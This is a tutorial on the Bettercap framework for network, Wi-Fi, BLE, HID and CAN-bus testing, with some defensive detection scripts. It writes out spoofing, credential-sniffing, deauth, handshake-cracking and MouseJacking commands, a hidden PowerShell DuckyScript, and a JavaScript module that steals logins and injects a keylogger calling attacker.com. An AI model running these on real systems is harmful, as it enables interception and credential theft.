
Bettercap: A Comprehensive Guide to Network Security Assessment and Penetration Testing

Master Bettercap for recon, MITM, and Wi-Fi attacks with step-by-step commands and real-world cybersecurity examples.


Introduction

Bettercap represents the state-of-the-art in network security assessment frameworks. Engineered in Go, this sophisticated, open-source platform provides security professionals with an enterprise-grade toolkit for comprehensive network reconnaissance, vulnerability assessment, and penetration testing. Its modular architecture delivers unprecedented flexibility across the full spectrum of network protocols and technologies, from traditional IPv4/IPv6 networks to wireless communications including WiFi, Bluetooth Low Energy (BLE), and Human Interface Devices (HID).

This technical analysis offers security practitioners a methodical examination of Bettercap's capabilities, complete with detailed command syntax, parameter descriptions, operational workflows, and attack methodologies for conducting authorized security assessments in enterprise environments.

Key Features and Technical Specifications

Bettercap's architectural framework encompasses multiple security domains with enterprise-level capabilities:

  • WiFi Network Security Assessment: Advanced reconnaissance, client enumeration, deauthentication vector implementation, PMKID acquisition via clientless association, and automated WPA/WPA2 handshake interception
  • Bluetooth Low Energy (BLE) Security Analysis: Device enumeration, service discovery, characteristic mapping, and read/write operations for IoT security assessment
  • Radio Frequency (RF) Attack Surface Evaluation: 2.4GHz wireless device identification and MouseJacking attack execution with HID frame injection capabilities including DuckyScript compatibility
  • Network Topology Discovery: Active and passive host identification with vendor fingerprinting, OS detection, and service enumeration
  • Layer 2/3 Traffic Manipulation: Comprehensive protocol spoofing (ARP, DNS, DHCPv6, NDP) for man-in-the-middle assessment across dual-stack IPv4/IPv6 network environments
  • Multi-layer Proxy Implementation: Packet-level, TCP stream, and application layer (HTTP/HTTPS) proxy functionality with JavaScript-based traffic manipulation and inspection
  • Protocol Analysis Engine: Deep packet inspection for credential extraction, protocol compliance verification, and fuzzing operations
  • Service Enumeration: High-throughput port scanning with service identification
  • Automotive Security: CAN-bus monitoring, diagnostic frame injection, custom DBC implementation, and OBD2 protocol analysis
  • Orchestration Interface: RESTful API architecture with WebSocket-based event notification for enterprise security integration
  • Visualization Layer: Browser-based interface for operational monitoring and control

Installation

Installing Bettercap is straightforward on most Linux distributions:

sudo apt install bettercap

For other platforms or installation methods, refer to the official documentation.

Basic Usage

Starting Bettercap

To launch Bettercap with default settings:

sudo bettercap

To specify a network interface:

sudo bettercap -iface eth0

To view available options:

sudo bettercap -h

The Bettercap Console

Once launched, Bettercap presents an interactive console. Here are essential commands to get started:

> help                # Display general help
> help <module>       # Show help for a specific module (e.g., help net.probe)
> quit                # Exit Bettercap

Network Reconnaissance Methodology

Bettercap implements sophisticated network discovery protocols designed to enumerate and profile network assets with minimal footprint. Proper reconnaissance forms the foundation of effective security assessment by establishing a comprehensive asset inventory.

Host Discovery Protocol

The network reconnaissance module employs multiple discovery vectors:

> net.probe on

This command initiates the active reconnaissance protocol, which performs:

  1. ARP Discovery: Broadcast Address Resolution Protocol queries to identify local network hosts
  2. mDNS Enumeration: Multicast DNS probing for service discovery
  3. NBNS Queries: NetBIOS Name Service requests for legacy Windows host identification
  4. UPNP Detection: Universal Plug and Play discovery to identify network devices with UPnP services enabled

The net.probe module automatically initiates the net.recon component, which maintains an active host inventory with continuous updates as new devices join the network.

To display the current reconnaissance data:

> net.show

The output provides tabular asset intelligence including:

  • MAC address (with vendor identification)
  • IPv4/IPv6 addressing
  • Host metadata (when available)
  • Last seen timestamp

Passive Reconnaissance Configuration

For environments requiring non-intrusive discovery:

> set net.probe.mdns false
> set net.probe.upnp false
> set net.probe.nbns false
> set net.probe.throttle 10
> net.probe on

This configuration disables the mDNS, UPnP and NBNS probes and throttles what remains to minimize network impact. Note that net.probe still sends ARP requests, so discovery is low-noise rather than truly passive; for strictly passive discovery, leave net.probe off and rely on net.recon on, which only reads the ARP cache and observes traffic already on the wire.

Man-in-the-Middle Attack Vectors

Bettercap provides enterprise-grade traffic interception capabilities through multiple attack vectors. These techniques allow security practitioners to assess an organization's resilience against traffic manipulation threats.

ARP Spoofing: Layer 2 Traffic Interception

Address Resolution Protocol (ARP) spoofing manipulates the ARP cache of network devices to redirect traffic flow. By falsifying MAC-to-IP address mappings, an attacker can position themselves between communication endpoints.

Technical Implementation:

> set arp.spoof.fullduplex true       # Enable bidirectional interception
> set arp.spoof.targets 192.168.1.10  # Target specific endpoint (omit for network-wide)
> arp.spoof on                        # Initiate ARP cache poisoning

Parameter Analysis:

  • fullduplex: When enabled, intercepts both directions of traffic flow (target↔gateway and gateway↔target)
  • targets: Specifies victim IP addresses (comma-separated for multiple targets)
  • Additional parameters include internal (spoof within target subnet) and whitelist (exclude specific hosts)

Detection and Countermeasures: ARP cache poisoning can be detected or blocked by controls including:

  • Static ARP entries
  • ARP inspection mechanisms
  • Network IDS/IPS alerts
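The inspection checks listed above can be scripted. The following is an added example, not part of Bettercap or of this article's original content: a small Python monitor that reads tcpdump-style ARP reply lines (a constructed sample is embedded; the gateway address 192.168.1.1 is assumed) and alerts on the two footprints a full-duplex poisoning run leaves behind, a changed gateway binding and one MAC answering for several IPs.

```python
import re
from collections import defaultdict

# Constructed sample of tcpdump-style ARP lines (not real capture data): two
# legitimate replies, then a third MAC claiming both the gateway and the target,
# which is the footprint of a full-duplex ARP poisoning run.
SAMPLE_LINES = [
    "12:00:01.000 ARP, Reply 192.168.1.1 is-at aa:aa:aa:aa:aa:01, length 28",
    "12:00:01.100 ARP, Reply 192.168.1.10 is-at bb:bb:bb:bb:bb:10, length 28",
    "12:00:05.000 ARP, Request who-has 192.168.1.1 tell 192.168.1.10, length 28",
    "12:00:05.010 ARP, Reply 192.168.1.1 is-at cc:cc:cc:cc:cc:cc, length 28",
    "12:00:05.020 ARP, Reply 192.168.1.10 is-at cc:cc:cc:cc:cc:cc, length 28",
]

REPLY_RE = re.compile(r"Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9A-Fa-f:]{17})")


def parse_reply(line):
    """Return (ip, mac) for an ARP reply line, or None for anything else."""
    m = REPLY_RE.search(line)
    return (m.group(1), m.group(2).lower()) if m else None


class ArpMonitor:
    """Tracks IP-to-MAC bindings seen in ARP replies and flags poisoning symptoms."""

    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.ip_to_mac = {}                      # last MAC seen for each IP
        self.mac_to_ips = defaultdict(set)       # every IP each MAC has claimed
        self.alerts = []

    def observe(self, ip, mac):
        """Record one binding and return the alerts it raises (possibly none)."""
        new = []
        prev = self.ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            # A changed binding is the core symptom; DHCP churn can also cause it,
            # so the gateway case is reported separately as the higher-confidence one.
            kind = "GATEWAY_MAC_CHANGED" if ip == self.gateway_ip else "IP_REMAPPED"
            new.append(f"{kind}: {ip} moved from {prev} to {mac}")
        self.ip_to_mac[ip] = mac
        claimed = self.mac_to_ips[mac]
        if ip not in claimed:
            claimed.add(ip)
            # One MAC answering for several IPs (gateway plus victims) is what
            # fullduplex spoofing looks like; legitimate multi-homed hosts are rare.
            if len(claimed) > 1:
                new.append(f"MAC_CLAIMS_MULTIPLE_IPS: {mac} -> {sorted(claimed)}")
        self.alerts.extend(new)
        return new

    def feed_lines(self, lines):
        """Run every ARP reply in an iterable of tcpdump-style lines through observe()."""
        for line in lines:
            parsed = parse_reply(line)
            if parsed:
                self.observe(*parsed)
        return self.alerts


def run_sample():
    """Process the constructed capture above against a gateway of 192.168.1.1."""
    return ArpMonitor("192.168.1.1").feed_lines(SAMPLE_LINES)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Feed it `tcpdump -n -e arp` output for a live view; a router carrying secondary addresses will legitimately trip the multiple-IP check, so whitelist known multi-homed MACs before paging anyone.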

DNS Spoofing: Domain Resolution Hijacking

DNS spoofing intercepts and modifies Domain Name System responses, allowing redirection of legitimate domain requests to attacker-controlled resources.

> set dns.spoof.domains *.company.com,*.org,finance.target.com
> set dns.spoof.address 192.168.1.100
> dns.spoof on

Technical Details:

  • Requires active ARP spoofing to intercept DNS queries
  • The domains parameter accepts wildcards and comma-separated values
  • address specifies the IP where matching domains will be redirected
  • Further parameters cover broader or file-driven redirection:
> set dns.spoof.all true          # Answer every DNS query, not only matching domains (high impact)
> set dns.spoof.hosts file.hosts  # Load name-to-address mappings from a hosts-format file
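As an added example (not from the article or from the Bettercap project), the following Python detector scores resolved answers for the three signs the dns.spoof configuration above produces: a public name resolving into private address space, an answer changing mid-session, and unrelated domains collapsing onto one address. The sample answers and the corp.example internal zone are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed zone list (assumption): names under these suffixes may legitimately
# resolve to private addresses, so they are exempt from the private-answer check.
INTERNAL_ZONES = ("corp.example",)

# Constructed A-record answers (qname, answer IP) modelled on the dns.spoof rule
# above, which sends *.company.com, *.org and finance.target.com to 192.168.1.100.
SAMPLE_ANSWERS = [
    ("intranet.corp.example", "10.0.0.5"),     # legitimate internal name
    ("www.example.org", "93.184.216.34"),      # normal public answer
    ("www.example.org", "192.168.1.100"),      # same name now spoofed by the *.org rule
    ("finance.target.com", "192.168.1.100"),
    ("portal.company.com", "192.168.1.100"),
]


def registrable_domain(name):
    """Crude registrable-domain guess (last two labels); enough for this check."""
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def is_internal(name):
    n = name.rstrip(".").lower()
    return any(n == z or n.endswith("." + z) for z in INTERNAL_ZONES)


class DnsSpoofDetector:
    """Flags answers that look like a wildcard spoofing rule rather than real resolution."""

    def __init__(self, collapse_threshold=3):
        self.collapse_threshold = collapse_threshold
        self.last_answer = {}                  # qname -> last IP answered
        self.domains_by_ip = defaultdict(set)  # answer IP -> registrable domains it served
        self.alerts = []

    def observe(self, qname, answer_ip):
        """Feed one A-record answer and return the alerts it raises (possibly none)."""
        new, name = [], qname.rstrip(".").lower()
        ip = str(ipaddress.ip_address(answer_ip))
        # 1. A public name pointing at RFC 1918 space is the signature of
        #    dns.spoof.address being a LAN host (192.168.1.100 in the example above).
        if ipaddress.ip_address(ip).is_private and not is_internal(name):
            new.append(f"PRIVATE_ANSWER_FOR_EXTERNAL_NAME: {name} -> {ip}")
        # 2. The same name changing its answer mid-session.
        prev = self.last_answer.get(name)
        if prev is not None and prev != ip:
            new.append(f"ANSWER_CHANGED: {name} {prev} -> {ip}")
        self.last_answer[name] = ip
        # 3. Unrelated domains collapsing onto one address, as a wildcard rule produces.
        doms = self.domains_by_ip[ip]
        dom = registrable_domain(name)
        if dom not in doms:
            doms.add(dom)
            if len(doms) >= self.collapse_threshold:
                new.append(f"MANY_DOMAINS_ONE_IP: {ip} answers for {sorted(doms)}")
        self.alerts.extend(new)
        return new


def run_sample():
    """Run the constructed answers through the detector and return all alerts."""
    det = DnsSpoofDetector()
    for qname, ip in SAMPLE_ANSWERS:
        det.observe(qname, ip)
    return det.alerts


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

CDN-fronted sites legitimately share addresses, so tune collapse_threshold and the internal zone list to the network before treating the third check as more than a hint.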

HTTPS Traffic Analysis

Bettercap can terminate TLS and inspect HTTPS traffic when it holds a certificate authority that the assessed clients trust. Clients that do not trust that CA, or that pin their certificates, will see certificate errors and fail the connection rather than expose plaintext, which is itself a useful measurement of the environment's resilience:

> set https.proxy.address 0.0.0.0
> set https.proxy.port 8443
> set https.proxy.certificate cert.pem
> set https.proxy.key key.pem
> https.proxy on

Bettercap can generate self-signed certificates for testing environments:

> https.proxy.certificate generate  # Create temporary testing certificates

IPv6-Specific Attack Vectors

For dual-stack environments, Bettercap provides specialized IPv6 attack modules:

> ndp.spoof on                     # IPv6 Neighbor Discovery Protocol spoofing
> dhcp6.spoof on                   # DHCPv6 spoofing for prefix delegation hijacking

These attacks enable traffic interception in networks that have implemented IPv6 transition mechanisms.

Advanced Traffic Analysis Framework

With traffic successfully intercepted, Bettercap's traffic analysis engine enables in-depth packet inspection, pattern matching, and data extraction.

Protocol Analyzer Implementation

> net.sniff on                           # Activate packet capture engine

Additional configuration parameters enhance analytical capabilities:

> set net.sniff.verbose false            # Suppress metadata for cleaner output
> set net.sniff.local true               # Include locally generated packets
> set net.sniff.filter tcp port 80       # Apply BPF filter for HTTP traffic
> set net.sniff.regexp '.*password=.*'   # Regular expression pattern matching
> set net.sniff.output captured.pcap     # Packet capture storage

Credential Harvesting Capabilities

Bettercap's pattern-matching engine automatically identifies authentication data across common protocols:

  • HTTP Basic/Digest Authentication
  • HTML Form Submissions
  • FTP Credentials
  • SMTP/POP3/IMAP Authentication
  • NTLM/Kerberos Authentication Tokens
  • Database Connection Strings

The built-in parsers transmit detected credentials to the event notification system:

> events.stream on                       # Enable real-time event monitoring
> set events.stream.output events.log    # Record events to log file

SSL Strip Implementation

For assessment of SSL downgrade vulnerabilities:

> set http.proxy.sslstrip true           # Enable SSL stripping
> http.proxy on                          # Activate HTTP proxy with stripping

This technique attempts to intercept HTTPS requests and rewrite them as HTTP, testing whether clients enforce encryption on their own. Browsers that already hold an HSTS policy for the site (or have it preloaded) refuse the downgrade, which is why HSTS is the primary defence against this class of attack.

WiFi Security Assessment Framework

Bettercap incorporates comprehensive wireless network assessment capabilities, allowing security professionals to evaluate WiFi infrastructure for vulnerabilities and misconfigurations.

Monitor Mode Configuration

Prior to wireless assessment, the interface must be configured for radio frequency monitoring:

sudo airmon-ng start wlan0   # External utility to enable monitor mode

Alternatively, Bettercap's wifi module attempts to switch the interface into monitor mode itself when wifi.recon is started; the following settings choose the interface and clear any channel lock:

> wifi.recon.channel clear   # Remove channel restrictions
> set wifi.interface wlan0   # Specify interface for monitoring

Wireless Network Reconnaissance

The WiFi reconnaissance module provides detailed enumeration of available wireless networks:

> set wifi.interface wlan0mon    # Specify monitor mode interface
> wifi.recon on                  # Initiate wireless scanning

To display discovered wireless networks with full technical specifications:

> wifi.show

The output contains critical security parameters:

  • BSSID (MAC address) of access points
  • ESSID (network name)
  • Security protocols implemented (Open, WEP, WPA, WPA2, WPA3)
  • Signal strength metrics (RSSI values)
  • Channel assignment and width
  • Supported data rates
  • Client associations

Deauthentication Attack Vector

The deauthentication attack forces client disconnection from wireless networks, enabling capture of reconnection handshakes and assessment of denial-of-service resilience:

> wifi.deauth 00:11:22:33:44:55        # Target specific access point

To deauthenticate a single client, pass the client's MAC address instead of the access point's BSSID:

> wifi.deauth AA:BB:CC:DD:EE:FF        # Target a specific client by its MAC address

Technical Details:

  • Transmits 802.11 deauthentication frames to specified targets
  • Requires no prior authentication to the network
  • Can be used to disconnect all clients (flood mode) or specific devices
  • Primarily used to force WPA/WPA2 handshake re-authentication

WPA/WPA2 Handshake Acquisition

To capture authentication handshakes for offline cryptanalysis:

> set wifi.interface wlan0mon
> set wifi.handshakes.file /path/to/capture.pcap  # Specify capture destination
> wifi.recon on
> wifi.deauth 00:11:22:33:44:55                   # Force reauthentication

The module automatically detects and records 4-way handshakes. The EAPOL frames carry the MIC (key confirmation) values derived from the PMK (Pairwise Master Key), which is what an offline password-recovery tool verifies candidate passphrases against.

PMKID Attack Implementation

For networks supporting Robust Security Network (RSN), the PMKID attack can extract authentication data without client interaction:

> set wifi.interface wlan0mon
> set wifi.handshakes.file /path/to/pmkid.pcap
> wifi.assoc 00:11:22:33:44:55        # Send association request to AP

This technique relies on access points that include the PMKID in the first EAPOL frame of the RSN handshake: a single association request is enough to make such an AP return the PMKID, which can then be subjected to offline analysis.

Handshake Cryptanalysis Preparation

After acquisition, handshake data must be converted for analysis with cryptanalysis tools:

sudo apt install hcxtools
hcxpcapngtool -o hashformat.22000 capture.pcap
hashcat -m 22000 hashformat.22000 /path/to/wordlist.txt

The conversion process extracts the cryptographic material from the captured packets and formats it for compatibility with password recovery tools.

Bluetooth Low Energy Security Analysis

Bettercap provides sophisticated Bluetooth Low Energy (BLE) assessment capabilities that enable security professionals to evaluate IoT device implementations and identify potential vulnerabilities in the BLE protocol stack.

BLE Device Discovery

To initiate Bluetooth Low Energy reconnaissance:

> ble.recon on                 # Activate BLE scanning module

This command activates the BLE scanning module, which:

  • Identifies advertising BLE peripherals within range
  • Captures device metadata including manufacturer data
  • Logs signal strength information for proximity estimation
  • Records advertised service UUIDs

To display discovered devices with technical specifications:

> ble.show                     # Display enumerated BLE devices

The output provides a comprehensive inventory of BLE devices including:

  • Device MAC addresses
  • Advertised device names
  • RSSI signal metrics
  • Manufacturer-specific data fields
  • Services advertised in scan response packets

BLE Service Enumeration

For identified devices, the enumeration module provides detailed service mapping:

> ble.enum AA:BB:CC:DD:EE:FF   # Enumerate services and characteristics

This process interrogates the GATT (Generic Attribute Profile) database to:

  • Discover all available services
  • Enumerate characteristics within each service
  • Identify readable/writable characteristics
  • Map notification-capable endpoints
  • Determine authentication requirements

BLE Data Exfiltration

To extract data from readable characteristics:

> ble.read AA:BB:CC:DD:EE:FF 1234  # Read characteristic with handle 0x1234

For devices with sensitive data exposed via readable characteristics, this technique can demonstrate potential data leakage vulnerabilities.

BLE Command Injection Assessment

To test for insecure write permissions:

> ble.write AA:BB:CC:DD:EE:FF 1234 0102030405  # Write hex data to characteristic

This operation evaluates if unauthenticated writes are permitted to characteristics that should require proper authentication, potentially revealing command injection vulnerabilities in the target device.

HID Radio Frequency Attack Framework

Bettercap incorporates specialized modules for assessing the security of wireless Human Interface Devices operating in the 2.4GHz spectrum. These capabilities enable security professionals to evaluate vulnerabilities in wireless keyboards, mice, and presentation devices.

Wireless HID Reconnaissance

To initiate scanning for vulnerable HID devices:

> hid.recon on                 # Begin scanning for 2.4GHz HID devices

This command activates the HID receiver, which:

  • Monitors the 2.4GHz spectrum for HID transmissions
  • Identifies vulnerable device signatures
  • Captures device addressing information
  • Logs signal characteristics and timing patterns

To display discovered HID devices:

> hid.show                     # List identified wireless HID devices

MouseJacking Attack Vector

The MouseJacking attack targets vulnerabilities in non-Bluetooth wireless input devices that fail to properly encrypt or authenticate transmitted commands:

> hid.sniff on                 # Capture legitimate HID frames

After identifying target devices, arbitrary commands can be injected:

> set hid.run calc.exe         # Define command to execute
> hid.inject -1                # Inject command to all detected devices

For targeted injection:

> hid.inject 00:11:22:33:44:55 # Inject command to specific device

DuckyScript Execution

For more sophisticated attack sequences, Bettercap supports the DuckyScript language:

> set hid.script /path/to/payload.duck  # Load DuckyScript payload
> hid.inject 00:11:22:33:44:55          # Execute script against target

Example DuckyScript payload:

DELAY 500
GUI r
DELAY 200
STRING powershell -w hidden -e <base64-encoded-command>
ENTER

This attack vector demonstrates the risk posed by wireless HID devices that lack proper encryption and authentication, potentially allowing unauthorized command execution on connected systems.

Web Application Assessment Framework

Bettercap provides sophisticated proxy capabilities designed for web application security assessment. These components enable security professionals to intercept, analyze, and modify HTTP and HTTPS traffic to evaluate web application security posture.

HTTP Proxy Implementation

To configure and activate the HTTP proxy module:

> set http.proxy.address 0.0.0.0         # Interface binding (all interfaces)
> set http.proxy.port 8080               # TCP port for proxy service
> http.proxy on                          # Initialize HTTP proxy

Additional configuration parameters enhance assessment capabilities:

> set http.proxy.sslstrip true           # Enable SSL downgrade attacks
> set http.proxy.injectjs /path/to/payload.js  # JavaScript injection
> set http.proxy.injectcss /path/to/style.css  # CSS injection

HTTPS Interception Framework

For secure traffic analysis, the HTTPS proxy provides TLS interception:

> set https.proxy.address 0.0.0.0        # Interface binding
> set https.proxy.port 8443              # TLS port for proxy service
> https.proxy on                         # Initialize HTTPS proxy

Certificate management options:

> https.proxy.certificate generate       # Generate ephemeral certificates

For enterprise environments with PKI infrastructure:

> set https.proxy.certificate /path/to/cert.pem  # Custom certificate
> set https.proxy.key /path/to/key.pem           # Private key

JavaScript Module Development

The proxy architecture supports custom JavaScript modules for advanced traffic manipulation:

> set http.proxy.script /path/to/module.js

Example JavaScript interceptor module:

/**
 * HTTP Request/Response manipulation module
 * This demonstrates how to modify authentication requests
 */
function onRequest(req, res) {
    if (req.Path.indexOf('/login') !== -1) {
        // ReadBody() loads the request body; req.Body is empty until it is called
        var body = req.ReadBody();
        var user = body.match(/username=([^&]*)/);
        var pass = body.match(/password=([^&]*)/);
        console.log('[+] Detected authentication attempt');
        // match() returns null when a field is absent, so guard before indexing
        console.log('    Username: ' + (user ? user[1] : '<absent>'));
        console.log('    Password: ' + (pass ? pass[1] : '<absent>'));

        // Request manipulation example: Force specific credentials
        req.Body = body.replace(/(password=)([^&]*)/, '$1compromised');
    }
    // Changes are made on the req/res objects in place; nothing is returned
}

function onResponse(req, res) {
    if (req.Path.indexOf('/login') !== -1) {
        // Response manipulation example: Inject keylogger
        if (res.ContentType && res.ContentType.indexOf('text/html') !== -1) {
            var body = res.ReadBody();
            res.Body = body.replace(
                '</head>',
                '<script>document.addEventListener("keypress", function(e) { ' +
                'fetch("http://attacker.com/log?k=" + e.key); });</script></head>'
            );
        }
    }
}

HTTP/HTTPS Server Module

The server module provides a customizable web server for phishing assessment and client-side attack simulation:

> set https.server.address 0.0.0.0       # Interface binding
> set https.server.port 443              # Service port
> set https.server.path /path/to/webroot # Document root
> https.server on                        # Activate HTTPS server

For phishing scenario evaluation:

> set https.server.template portal       # Load predefined template

This module allows security teams to assess employee susceptibility to phishing attacks and evaluate the effectiveness of security awareness programs.

Automotive Security Assessment

Bettercap incorporates specialized modules for Controller Area Network (CAN) bus analysis, enabling security professionals to evaluate automotive network security.

CAN Bus Interface Configuration

To initialize the CAN bus interface:

> set can.interface vcan0           # Specify virtual or physical CAN interface
> can.reconnect                     # Establish connection to CAN bus

For hardware interfaces:

> set can.interface can0            # Physical CAN interface
> set can.bitrate 500000            # Set appropriate bitrate (typically 500kbps)

CAN Bus Traffic Analysis

To monitor raw CAN bus traffic:

> can.sniff on                      # Begin capturing CAN frames

This command initiates the CAN bus analyzer, which:

  • Captures all CAN frames on the specified interface
  • Displays frame ID, data length, and payload
  • Calculates bus utilization metrics
  • Identifies periodic message patterns

Diagnostic Protocol Analysis

For vehicles supporting standard OBD-II protocols:

> set can.obd.protocol auto         # Auto-detect OBD protocol
> can.obd.list                      # Display available PIDs
> can.obd.get rpm                   # Query specific parameter (RPM)

To query multiple parameters:

> can.obd.get rpm,speed,temp        # Query multiple parameters

Custom DBC File Integration

For comprehensive signal decoding:

> set can.dbc.file vehicle.dbc      # Load vehicle-specific DBC
> can.dbc.view                      # List available signals
> can.dbc.monitor engine_speed      # Monitor specific signal

This functionality uses the vehicle's DBC (CAN database) file, which describes each frame's signals (start bit, length, byte order, sign, scaling factor and offset), to decode raw CAN payloads into meaningful engineering values.
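To make the decoding step concrete, here is an added example (not Bettercap's own code) of a minimal DBC signal decoder in Python: it parses BO_/SG_ definitions, handles Intel and Motorola byte order, signed values, factor and offset, and decodes a constructed frame. The DBC fragment and frame bytes are assumptions, not a real vehicle's data.

```python
import re
from dataclasses import dataclass

# Constructed DBC fragment (assumption, not a real vehicle's file): one frame with
# an Intel (@1) unsigned signal, a Motorola (@0) signal and an Intel signed signal.
SAMPLE_DBC = """
BO_ 256 EngineData: 8 ECU
 SG_ EngineSpeed : 24|16@1+ (0.125,0) [0|8031.875] "rpm" Vector__XXX
 SG_ CoolantTemp : 7|8@0+ (1,-40) [-40|215] "degC" Vector__XXX
 SG_ TorqueDemand : 16|8@1- (1,0) [-125|125] "%" Vector__XXX
"""

# Constructed frame for CAN ID 0x100 (256): byte0=0x64 temp, byte2=0xF6 torque,
# bytes3-4=0x1F40 little-endian engine speed.
SAMPLE_FRAME = (0x100, bytes([0x64, 0x00, 0xF6, 0x40, 0x1F, 0x00, 0x00, 0x00]))

BO_RE = re.compile(r"^BO_\s+(\d+)\s+(\w+)\s*:\s*(\d+)")
SG_RE = re.compile(r'^\s*SG_\s+(\w+)\s*:\s*(\d+)\|(\d+)@([01])([+-])\s*'
                   r'\(([^,]+),([^)]+)\)\s*\[[^\]]*\]\s*"([^"]*)"')


@dataclass
class Signal:
    name: str
    start: int           # DBC start bit: LSB for Intel, MSB for Motorola
    length: int
    little_endian: bool  # @1 = Intel, @0 = Motorola
    signed: bool         # '-' after the byte-order flag
    factor: float
    offset: float
    unit: str


def parse_dbc(text):
    """Return {can_id: [Signal, ...]} from the BO_/SG_ lines of a DBC file."""
    frames, current = {}, None
    for line in text.splitlines():
        bo = BO_RE.match(line)
        if bo:
            current = int(bo.group(1)) & 0x1FFFFFFF  # DBC sets bit 31 for extended IDs
            frames[current] = []
            continue
        sg = SG_RE.match(line)
        if sg and current is not None:
            frames[current].append(Signal(
                sg.group(1), int(sg.group(2)), int(sg.group(3)),
                sg.group(4) == "1", sg.group(5) == "-",
                float(sg.group(6)), float(sg.group(7)), sg.group(8)))
    return frames


def extract_raw(data, sig):
    """Pull the raw integer for one signal out of a CAN payload."""
    nbits = len(data) * 8
    mask = (1 << sig.length) - 1
    if sig.little_endian:
        raw = (int.from_bytes(data, "little") >> sig.start) & mask
    else:
        # Motorola start bit names the MSB in sawtooth numbering (bit 7 = MSB of
        # byte 0); convert it to an offset from the frame's first bit.
        msb = (sig.start // 8) * 8 + (7 - sig.start % 8)
        raw = (int.from_bytes(data, "big") >> (nbits - msb - sig.length)) & mask
    if sig.signed and raw & (1 << (sig.length - 1)):
        raw -= 1 << sig.length                    # two's complement
    return raw


def decode_frame(frames, can_id, data):
    """Decode every known signal of a frame into physical units."""
    return {s.name: extract_raw(data, s) * s.factor + s.offset
            for s in frames.get(can_id, [])}


def run_sample():
    return decode_frame(parse_dbc(SAMPLE_DBC), *SAMPLE_FRAME)


if __name__ == "__main__":
    print(run_sample())
```

Multiplexed signals (the `m0`/`M` markers some DBC files carry) are not handled here; a frame whose ID has no BO_ entry decodes to an empty dict rather than raising, which is what you want when monitoring a bus with unknown traffic.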

CAN Bus Fuzzing

To perform security assessment of CAN networks:

> set can.fuzzer.id 0x7DF           # Target specific CAN ID
> set can.fuzzer.data "\x02\x01\x00\x00\x00\x00\x00\x00"  # Base frame
> can.fuzz.sequential 3,0xFF        # Sequential fuzz of byte 3

Alternative fuzzing strategies:

> can.fuzz.random 0,7               # Random payload fuzzing

This technique allows security professionals to identify potential vulnerabilities in vehicle systems that might accept malformed CAN messages.

Conclusion

Bettercap represents one of the most comprehensive network security testing frameworks available today. Its versatility across various network protocols and technologies makes it an invaluable tool for security professionals. By understanding its capabilities and commands, security researchers can effectively assess network security postures and identify potential vulnerabilities before malicious actors can exploit them.

Through responsible use and continuous learning, Bettercap can significantly enhance your security testing methodology and provide deeper insights into network security challenges.
